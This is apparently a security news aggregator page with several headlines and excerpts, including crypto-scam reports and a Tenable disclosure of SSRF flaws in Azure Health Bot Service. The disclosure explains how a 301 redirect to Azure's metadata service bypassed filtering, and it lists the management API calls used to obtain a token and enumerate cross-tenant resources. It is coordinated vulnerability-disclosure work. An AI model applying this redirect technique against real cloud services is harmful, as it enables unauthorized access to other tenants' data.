Aggregator
Mr. Robot
CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations
As digital currencies have grown, so have cryptocurrency scams, posing significant user risks. The rise of AI and deepfake technology has intensified scams exploiting famous personalities and events by creating realistic fake videos. Platforms like X and YouTube have been especially targeted, with scammers hijacking high-profile accounts to distribute fraudulent content. This report delves into the CryptoCore group's complex scam operations, analyzing their use of deepfakes, hijacked accounts, and fraudulent websites to deceive victims and profit millions of dollars.
The post CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations appeared first on Avast Threat Labs.
Over 100 Ukrainian computers infected with backdoor malware, researchers say
Microsoft PlayReady WMRMECC256 Key / root key issue (attack #5)
Horizon3.ai Partners with FedHIVE to Revolutionize Cybersecurity in the Public Sector
Proactive Security | Enhancing Risk Visibility with Extended Security Posture Management (xSPM)
Introducing HTTP request traffic insights on Cloudflare Radar
Cequence Storms Black Hat with API Security Testing for Generative AI Applications
Cequence Storms Black Hat with API Security Testing for Generative AI Applications
That’s a wrap for Black Hat 2024! We had a great show and met many of you at the booth or on the show floor. I hope you were able to come by, watched a session by Jason Kent, Hacker in Residence at Cequence, or Parth Shukla, Security Engineer at Cequence, and maybe even entered […]
The post Cequence Storms Black Hat with API Security Testing for Generative AI Applications appeared first on Cequence Security.
The post Cequence Storms Black Hat with API Security Testing for Generative AI Applications appeared first on Security Boulevard.
Preparation Is Not Optional: 10 Incident Response Readiness Considerations for Any Organization
Researchers Uncover Vulnerabilities in AI-Powered Azure Health Bot Service
Dispelling Continuous Threat Exposure Management (CTEM) Myths
Researchers Uncover Vulnerabilities in AI-Powered Azure Health Bot Service
Compromising Microsoft's AI Healthcare Chatbot Service
Tenable Research discovered multiple privilege-escalation issues in the Azure Health Bot Service via a server-side request forgery (SSRF), which allowed researchers access to cross-tenant resources.
Key takeaways- The Azure Health Bot Service is a cloud platform that allows healthcare professionals to deploy AI-powered virtual health assistants.
- Tenable Research discovered critical vulnerabilities that allowed access to cross-tenant resources within this service. Based on the level of access granted, it’s likely that lateral movement to other resources would have been possible.
- According to Microsoft, mitigations for these issues have been applied to all affected services and regions. No customer action is required.
(Source: Image generated via ChatGPT 4o / DALL-E by Nick Miles)
An overview of the Azure Health Bot ServiceThis is how Microsoft describes the Azure Health Bot Service:
“The Azure Health Bot Service is a cloud platform that empowers developers in Healthcare organizations to build and deploy compliant, AI-powered virtual health assistants, that help them improve processes and reduce costs. It allows healthcare organizations to create experiences that act as copilots for their healthcare professionals to further manage administrative workloads, and experiences that engage with their patients.”
Essentially, the service allows healthcare providers to create and deploy patient-facing chatbots to handle administrative workflows within their environments. Thus, these chatbots generally have some amount of access to sensitive patient information, though the information available to these bots can vary based on each bot’s configuration.
While auditing this service for security issues, Tenable researchers became interested in a feature dubbed "Data Connections" in the service's documentation. These data connections allow bots to interact with external data sources to retrieve information from other services that the provider may be using, such as a portal for patient information or a reference database for general medical information.
The first discoveryThis data connection feature is designed to allow the service’s backend to make requests to third-party APIs. While testing these data connections to see if endpoints internal to the service could be interacted with, Tenable researchers discovered that many common endpoints, such as Azure’s Internal Metadata Service (IMDS), were appropriately filtered or inaccessible. Upon closer inspection, however, it was discovered that issuing redirect responses (e.g. 301/302 status codes) allowed these mitigations to be bypassed.
“A server-side request forgery is a web security vulnerability that allows an attacker to force an application on a remote host to make requests to an unintended location.”
For example, by configuring a data connection within the service’s scenario editor, researchers were able to specify an external host under their control.
On this external host, researchers configured it to respond to requests with a 301 redirect response destined for Azure’s IMDS.
After obtaining a valid metadata response, researchers attempted to obtain an access token for management.azure.com.
With this token, researchers were then able to list the subscriptions they had access to via a call to https://management.azure.com/subscriptions?api-version=2020-01-01, which provided them with a subscription ID internal to Microsoft.
Finally, researchers were able to list the resources they had access to via https://management.azure.com/subscriptions/<REDACTED>/resources?api-version=2020-10-01. The resulting list of resources contained hundreds and hundreds of resources belonging to other customers.
A quick fixUpon seeing that these resources contained identifiers indicating cross-tenant information (i.e. information for other users/customers of the service), Tenable researchers immediately halted their investigation of this attack vector and reported their findings to MSRC on June 17, 2024. MSRC acknowledged Tenable’s report and began their investigation the same day.
Within the week, MSRC confirmed Tenable’s report and began introducing fixes into the affected environments. As of July 2, MSRC has stated that fixes have been rolled out to all regions. To Tenable’s knowledge, no evidence was discovered that indicated this issue had been exploited by a malicious actor.
Doing it againOnce MSRC stated that this issue had been fixed, Tenable Research picked up where it left off to confirm that the original proof-of-concepts provided to MSRC during the disclosure process were no longer functional. As it turns out, the fix for this issue was to simply reject redirect status codes altogether for data connection endpoints, which eliminated this attack vector.
That said, researchers discovered another endpoint used for validating data connections for FHIR endpoints. This validation mechanism was more or less vulnerable to the same attack described above. The difference between this issue and the first is the overall impact. The FHIR endpoint vector did not have the ability to influence request headers, which limits the ability to access IMDS directly. While other service internals are accessible via this vector, Microsoft has stated that this particular vulnerability had no cross-tenant access.
As before, the researchers immediately halted their investigation and reported the finding to Microsoft, opting to respect MSRC’s guidance regarding accessing cross-tenant resources. This second issue was reported on July 9 with fixes available by July 12. As with the first issue, to Tenable’s knowledge, no evidence was discovered that indicated this issue had been exploited by a malicious actor.
ConclusionThe vulnerabilities discussed in this post involve flaws in the underlying architecture of the AI chatbot service rather than the AI models themselves. As explained by Lucas Tamagna-Darr in a Tenable research blog post last week, this highlights the continued importance of traditional web application and cloud security mechanisms in this new age of AI powered services.
Please see TRA-2024-27 and TRA-2024-28 for more information regarding each of the discoveries mentioned in this post.
CryptoScam Strikes Misusing Trump & Musk Interview
Scammers have exploited the popularity of former President Donald Trump and tech mogul Elon Musk to deceive unsuspecting victims. According to a recent tweet by Avast Threat Labs, the fraudulent scheme involved hijacking YouTube accounts to broadcast fake interviews, and within just a few hours, it amassed approximately $9,000. Hijacked YouTube Accounts Fuel Deception The […]
The post CryptoScam Strikes Misusing Trump & Musk Interview appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.